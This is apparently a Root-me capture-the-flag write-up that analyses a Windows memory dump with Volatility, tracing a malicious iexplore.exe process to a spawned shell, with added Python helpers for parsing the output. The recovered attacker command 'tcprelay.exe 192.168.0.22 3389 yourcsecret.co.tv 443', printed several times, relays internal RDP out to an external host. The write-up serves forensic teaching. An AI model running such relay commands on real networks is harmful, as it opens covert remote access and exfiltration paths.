Rootme Command and control level 4
Root-me.org
Command & Control - Level 4
Malware Analysis
We now know that iexplore.exe is the malware. Now we need to figure out the IP of the internal server used by the hackers.
So let’s go back to the process list
vol.py --profile=Win7SP1x86 -f ch2.dmp pslist
Volatility Foundation Volatility Framework 2.6
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x87978b78 System 4 0 103 3257 ------ 0 2013-01-12 16:38:09 UTC+0000
0x88c3ed40 smss.exe 308 4 2 29 ------ 0 2013-01-12 16:38:09 UTC+0000
0x8929fd40 csrss.exe 404 396 9 469 0 0 2013-01-12 16:38:14 UTC+0000
0x892ac2b8 wininit.exe 456 396 3 77 0 0 2013-01-12 16:38:14 UTC+0000
0x88d03a00 csrss.exe 468 448 10 471 1 0 2013-01-12 16:38:14 UTC+0000
0x892ced40 winlogon.exe 500 448 3 111 1 0 2013-01-12 16:38:14 UTC+0000
0x896294c0 services.exe 560 456 6 205 0 0 2013-01-12 16:38:16 UTC+0000
0x896427b8 lsass.exe 576 456 6 566 0 0 2013-01-12 16:38:16 UTC+0000
0x8962f7e8 lsm.exe 584 456 10 142 0 0 2013-01-12 16:38:16 UTC+0000
0x8962f030 svchost.exe 692 560 10 353 0 0 2013-01-12 16:38:21 UTC+0000
0x897b5c20 svchost.exe 764 560 7 263 0 0 2013-01-12 16:38:23 UTC+0000
0x89805420 svchost.exe 832 560 19 435 0 0 2013-01-12 16:38:23 UTC+0000
0x89852918 svchost.exe 904 560 17 409 0 0 2013-01-12 16:38:24 UTC+0000
0x8986b030 svchost.exe 928 560 26 869 0 0 2013-01-12 16:38:24 UTC+0000
0x898911a8 svchost.exe 1084 560 10 257 0 0 2013-01-12 16:38:26 UTC+0000
0x898b2790 svchost.exe 1172 560 15 475 0 0 2013-01-12 16:38:27 UTC+0000
0x898a7868 AvastSvc.exe 1220 560 66 1180 0 0 2013-01-12 16:38:28 UTC+0000
0x8a0f9c40 spoolsv.exe 1712 560 14 338 0 0 2013-01-12 16:38:58 UTC+0000
0x8a102748 svchost.exe 1748 560 18 310 0 0 2013-01-12 16:38:58 UTC+0000
0x88cded40 sppsvc.exe 1872 560 4 143 0 0 2013-01-12 16:39:02 UTC+0000
0x8a1d84e0 vmtoolsd.exe 1968 560 6 220 0 0 2013-01-12 16:39:14 UTC+0000
0x9541c7e0 wlms.exe 336 560 4 45 0 0 2013-01-12 16:39:21 UTC+0000
0x8a1f5030 VMUpgradeHelpe 448 560 4 89 0 0 2013-01-12 16:39:21 UTC+0000
0x9542a030 TPAutoConnSvc. 1612 560 9 135 0 0 2013-01-12 16:39:23 UTC+0000
0x87ac0620 taskhost.exe 2352 560 8 149 1 0 2013-01-12 16:40:24 UTC+0000
0x87ad44d0 dwm.exe 2496 904 5 77 1 0 2013-01-12 16:40:25 UTC+0000
0x87ac6030 explorer.exe 2548 2484 24 766 1 0 2013-01-12 16:40:27 UTC+0000
0x87ae2880 TPAutoConnect. 2568 1612 5 146 1 0 2013-01-12 16:40:28 UTC+0000
0x87a9c288 conhost.exe 2600 468 1 35 1 0 2013-01-12 16:40:28 UTC+0000
0x87b82438 VMwareTray.exe 2660 2548 5 80 1 0 2013-01-12 16:40:29 UTC+0000
0x87aa9220 VMwareUser.exe 2676 2548 8 190 1 0 2013-01-12 16:40:30 UTC+0000
0x87b784b0 AvastUI.exe 2720 2548 14 220 1 0 2013-01-12 16:40:31 UTC+0000
0x898fe8c0 StikyNot.exe 2744 2548 8 135 1 0 2013-01-12 16:40:32 UTC+0000
0x87b6b030 iexplore.exe 2772 2548 2 74 1 0 2013-01-12 16:40:34 UTC+0000
0x898fbb18 SearchIndexer. 2900 560 13 636 0 0 2013-01-12 16:40:38 UTC+0000
0x87bd35b8 wmpnetwk.exe 3176 560 9 240 0 0 2013-01-12 16:40:48 UTC+0000
0x89f3d2c0 svchost.exe 3352 560 9 141 0 0 2013-01-12 16:40:58 UTC+0000
0x87c6a2a0 swriter.exe 3452 2548 1 19 1 0 2013-01-12 16:41:01 UTC+0000
0x87ba4030 soffice.exe 3512 3452 1 28 1 0 2013-01-12 16:41:03 UTC+0000
0x95483d18 soffice.bin 3556 3544 0 -------- 1 0 2013-01-12 16:41:05 UTC+0000 2013-01-12 16:41:39 UTC+0000
0x87b8ca58 soffice.bin 3564 3512 12 400 1 0 2013-01-12 16:41:05 UTC+0000
0x89f1d3e8 svchost.exe 3624 560 14 348 0 0 2013-01-12 16:41:22 UTC+0000
0x95495c18 taskmgr.exe 1232 2548 6 116 1 0 2013-01-12 16:42:29 UTC+0000
0x87bf7030 cmd.exe 3152 2548 1 23 1 0 2013-01-12 16:44:50 UTC+0000
0x87c595b0 conhost.exe 3228 468 2 54 1 0 2013-01-12 16:44:50 UTC+0000
0x89898030 cmd.exe 1616 2772 2 101 1 0 2013-01-12 16:55:49 UTC+0000
0x954826b0 conhost.exe 2168 468 2 49 1 0 2013-01-12 16:55:50 UTC+0000
0x9549f678 iexplore.exe 1136 2548 18 454 1 0 2013-01-12 16:57:44 UTC+0000
0x87d4d338 iexplore.exe 3044 1136 37 937 1 0 2013-01-12 16:57:46 UTC+0000
0x87c90d40 audiodg.exe 1720 832 5 117 0 0 2013-01-12 16:58:11 UTC+0000
0x87cbfd40 winpmem-1.3.1. 3144 3152 1 23 1 0 2013-01-12 16:59:17 UTC+0000
We got 3 iexplore processes.
vol.py --profile=Win7SP1x86 -f ch2.dmp pslist | grep iexplore
Volatility Foundation Volatility Framework 2.6
0x87b6b030 iexplore.exe 2772 2548 2 74 1 0 2013-01-12 16:40:34 UTC+0000
0x9549f678 iexplore.exe 1136 2548 18 454 1 0 2013-01-12 16:57:44 UTC+0000
0x87d4d338 iexplore.exe 3044 1136 37 937 1 0 2013-01-12 16:57:46 UTC+0000
We can start by checking whether any of the iexplore.exe processes is the parent of other processes.
vol.py --profile=Win7SP1x86 -f ch2.dmp pslist | grep -e "3044" -e "2772" -e "1136"
Volatility Foundation Volatility Framework 2.6
0x87b6b030 iexplore.exe 2772 2548 2 74 1 0 2013-01-12 16:40:34 UTC+0000
0x89898030 cmd.exe 1616 2772 2 101 1 0 2013-01-12 16:55:49 UTC+0000
0x9549f678 iexplore.exe 1136 2548 18 454 1 0 2013-01-12 16:57:44 UTC+0000
0x87d4d338 iexplore.exe 3044 1136 37 937 1 0 2013-01-12 16:57:46 UTC+0000
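The parent check done above with grep, as an added script that is not part of the original writeup: it parses Volatility 2 pslist rows (a subset of the output above, so every PID is the page's own) and rebuilds the parent/child relations; the list of shell names it flags is an assumption.

```python
"""Rebuild parent/child relations from Volatility 2 pslist output.
Added example, not from the writeup; rows below are a subset of the pslist
output above, so every PID is the page's own."""

# Constructed sample: banner, header and a subset of the rows shown above.
PSLIST_OUTPUT = """\
Volatility Foundation Volatility Framework 2.6
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x87ac6030 explorer.exe 2548 2484 24 766 1 0 2013-01-12 16:40:27 UTC+0000
0x87b6b030 iexplore.exe 2772 2548 2 74 1 0 2013-01-12 16:40:34 UTC+0000
0x87bf7030 cmd.exe 3152 2548 1 23 1 0 2013-01-12 16:44:50 UTC+0000
0x89898030 cmd.exe 1616 2772 2 101 1 0 2013-01-12 16:55:49 UTC+0000
0x954826b0 conhost.exe 2168 468 2 49 1 0 2013-01-12 16:55:50 UTC+0000
0x9549f678 iexplore.exe 1136 2548 18 454 1 0 2013-01-12 16:57:44 UTC+0000
0x87d4d338 iexplore.exe 3044 1136 37 937 1 0 2013-01-12 16:57:46 UTC+0000
0x87cbfd40 winpmem-1.3.1. 3144 3152 1 23 1 0 2013-01-12 16:59:17 UTC+0000
"""


def parse_pslist(text):
    """Return {pid: (name, ppid)}; banner, header and separator rows are skipped."""
    procs = {}
    for line in text.splitlines():
        parts = line.split()
        # Data rows start with a hex offset; Name never contains spaces here.
        if len(parts) < 4 or not parts[0].startswith("0x"):
            continue
        procs[int(parts[2])] = (parts[1], int(parts[3]))
    return procs


def children_of(procs, parent_name):
    """(child_pid, child_name, ppid) for every process whose parent is named parent_name."""
    return [(pid, name, ppid) for pid, (name, ppid) in sorted(procs.items())
            if procs.get(ppid, ("", 0))[0] == parent_name]


def shell_spawned_by(procs, parent_name="iexplore.exe", shells=("cmd.exe", "powershell.exe")):
    """Flag a browser process that launches a command shell: the chain this
    writeup pivots on, and a common C2 detection rule (shell list is assumed)."""
    return [c for c in children_of(procs, parent_name) if c[1] in shells]


if __name__ == "__main__":
    procs = parse_pslist(PSLIST_OUTPUT)
    for pid, name, ppid in children_of(procs, "iexplore.exe"):
        print(f"{name} ({pid}) <- iexplore.exe ({ppid})")
    print("shell spawned by a browser:", shell_spawned_by(procs))
```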
There’s a cmd.exe (PID 1616) that has 2772 as its parent, so the first iexplore.exe spawned a shell. Let’s run the cmdscan plugin to see all the commands that were run.
vol.py --profile=Win7SP1x86 -f ch2.dmp cmdscan
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: conhost.exe Pid: 3228
CommandHistory: 0x2ff638 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 5 LastAdded: 4 LastDisplayed: 4
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64
Cmd #0 @ 0x2fcd58: cd %temp%
Cmd #1 @ 0x2fd348: dir
Cmd #2 @ 0x2e1038: cd imagedump
Cmd #3 @ 0x2fd378: dir
Cmd #4 @ 0x304870: winpmem-1.3.1.exe ram.dmp
Cmd #12 @ 0x2d0038: 0?0^B
Cmd #36 @ 0x2d00c4: /?0?-???-
Cmd #37 @ 0x2fc1a8: 0?-???????/^A
**************************************************
CommandProcess: conhost.exe Pid: 3228
CommandHistory: 0x3007a8 Application: winpmem-1.3.1.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x90
**************************************************
CommandProcess: conhost.exe Pid: 2168
CommandHistory: 0x427700 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64
Cmd #6 @ 0x350039: ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????h??????????????^A???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????^A???????????????????????????????????????????????????????????????^A???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????????????????????^A
Cmd #16 @ 0x330035: ?
Cmd #36 @ 0x4000c4: A?B?@???@
Cmd #37 @ 0x4140f0: B?@????
There’s nothing interesting here. There’s another plugin, consoles, that lets us see all the input and output of each console session (it reads the console’s screen buffer, not just the command history).
vol.py --profile=Win7SP1x86 -f ch2.dmp consoles
...
ConsoleProcess: conhost.exe Pid: 2168
Console: 0x1081c0 CommandHistorySize: 50
HistoryBufferCount: 3 HistoryBufferMax: 4
OriginalTitle: %SystemRoot%\system32\cmd.exe
Title: C:\Windows\system32\cmd.exe
AttachedProcess: cmd.exe Pid: 1616 Handle: 0x64
----
CommandHistory: 0x427a60 Application: tcprelay.exe Flags:
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x0
----
CommandHistory: 0x427890 Application: whoami.exe Flags:
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x0
----
CommandHistory: 0x427700 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64
A tcprelay.exe application (along with whoami.exe) got executed in the console attached to cmd.exe PID 1616, exactly the same cmd.exe we saw spawned by iexplore.exe 2772.
We’ll run strings on the dump and grep for tcprelay to see what it was run with.
strings ch2.dmp | grep tcprelay
tcprelay.exe
tcprelay.exe
tcprelay.exe
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
tcprelay.c
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exe
\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exe
tcprelay.exe
5C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
tcprelay.c
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
01/12/2013 05:57 PM 22,078 tcprelay.exe
mp\TEMP23\tcprelay.exe
Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
01/12/2013 05:57 PM 22,078 tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ"
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ"
5C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
tcprelay.c
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
I think we got it. The internal server is 192.168.0.22, reached over the RDP port (3389) and relayed out to yourcsecret.co.tv on port 443.
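The last step, pulling the relay endpoints out of the noisy strings output, as an added script that is not part of the original writeup; the sample lines are copied from the output above, and the argument order (local host, local port, remote host, remote port) is an assumption taken from the single form seen on the page.

```python
"""Extract relay endpoints from `strings ch2.dmp | grep tcprelay` output.
Added example, not the writeup's; the argument order (local_host local_port
remote_host remote_port) is assumed from the single form seen on the page."""
import ipaddress
import re
from collections import Counter

# Constructed sample: lines copied from the strings output above, keeping the
# stray bytes that strings leaves glued onto some paths.
STRINGS_OUTPUT = r"""
tcprelay.exe
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exe
01/12/2013 05:57 PM 22,078 tcprelay.exe
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
5C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
"""

CMDLINE_RE = re.compile(r"tcprelay\.exe\s+(\S+)\s+(\d{1,5})\s+(\S+)\s+(\d{1,5})")
PATH_RE = re.compile(r"(?:[A-Za-z]:)?(?:\\[^\\\n]+)+\\tcprelay\.exe")
PORT_NAMES = {3389: "RDP", 443: "HTTPS"}  # assumed labels for the ports seen


def relay_configs(text):
    """Count each distinct (local_host, local_port, remote_host, remote_port)."""
    return Counter((m.group(1), int(m.group(2)), m.group(3), int(m.group(4)))
                   for m in CMDLINE_RE.finditer(text))


def binary_paths(text):
    """Unique on-disk paths of the relay binary, trailing junk bytes cut off."""
    return sorted({m.group(0) for m in PATH_RE.finditer(text)})


def is_private_ip(host):
    """True for RFC 1918-style addresses; a hostname is not an IP -> False."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def describe(configs):
    """One line per relay configuration, tagging the private side as internal."""
    return [f"{lh}:{lp} ({PORT_NAMES.get(lp, 'tcp')}, "
            f"{'internal' if is_private_ip(lh) else 'external'}) -> "
            f"{rh}:{rp} ({PORT_NAMES.get(rp, 'tcp')}) [seen {n}x]"
            for (lh, lp, rh, rp), n in configs.items()]
```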